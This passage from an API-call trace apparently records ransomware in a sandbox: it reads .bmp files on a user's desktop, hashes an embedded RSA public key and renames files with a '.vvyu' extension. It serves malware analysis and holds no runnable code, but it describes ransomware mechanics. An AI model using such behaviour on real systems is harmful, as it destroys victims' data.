lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.384] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.385] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.385] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.385] CloseHandle (hObject=0x584) returned 1 [0192.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0192.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.387] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\ov6fZG.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\ov6fzg.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\ov6fZG.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\ov6fzg.bmp.vvyu")) returned 1 [0192.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.388] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0192.391] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5abc70, ftCreationTime.dwHighDateTime=0x1d8a236, ftLastAccessTime.dwLowDateTime=0xdcee2ab0, ftLastAccessTime.dwHighDateTime=0x1d8a44e, ftLastWriteTime.dwLowDateTime=0xdcee2ab0, ftLastWriteTime.dwHighDateTime=0x1d8a44e, nFileSizeHigh=0x0, nFileSizeLow=0xab89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qia7.bmp", cAlternateFileName="")) returned 1 [0192.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0192.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.392] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\Qia7.bmp") returned=".bmp" [0192.392] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\Qia7.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\qia7.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.393] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=43913) returned 1 [0192.393] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.397] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xab63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.397] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.399] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.399] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xab89, lpOverlapped=0x0) returned 1 [0192.400] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.400] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.400] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.400] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.401] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.401] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.402] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.402] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.402] GetLastError () returned 0x0 [0192.402] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0192.402] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.402] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.402] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.402] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xab90) returned 0x2af5168 [0192.403] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0192.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.404] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61b8 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae61a0 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.407] GetCurrentThreadId () returned 0x5d8 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7338 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.407] GetCurrentThreadId () returned 0x5d8 [0192.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61b8 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6218 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6230 [0192.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61d0 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61a0 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0192.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 